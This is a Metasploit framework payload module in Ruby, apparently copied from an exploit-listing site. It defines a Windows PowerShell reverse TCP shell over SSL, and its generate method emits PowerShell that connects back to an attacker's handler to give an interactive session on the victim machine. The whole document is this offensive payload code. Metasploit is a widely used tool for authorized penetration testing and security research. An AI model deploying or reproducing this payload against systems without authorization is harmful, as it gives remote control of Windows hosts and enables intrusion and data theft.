Share
## https://sploitus.com/exploit?id=MSF:PAYLOAD/CMD/WINDOWS/POWERSHELL_REVERSE_TCP_SSL/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/powershell'

module MetasploitModule
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Rex::Powershell::Command
  include Msf::Payload::Windows::Powershell

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Windows Interactive Powershell Session, Reverse TCP SSL',
        'Description' => 'Interacts with a powershell session on an established SSL socket connection',
        'Author' => [
          'Ben Turner', # benpturner
          'Dave Hardy' # davehardy20
        ],
        'References' => [
          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit/']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'windows',
        'Arch' => ARCH_CMD,
        'Handler' => Msf::Handler::ReverseTcpSsl,
        'Session' => Msf::Sessions::PowerShell,
        'RequiredCmd' => 'generic',
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
  end

  def generate
    generate_powershell_code('SSL')
  end
end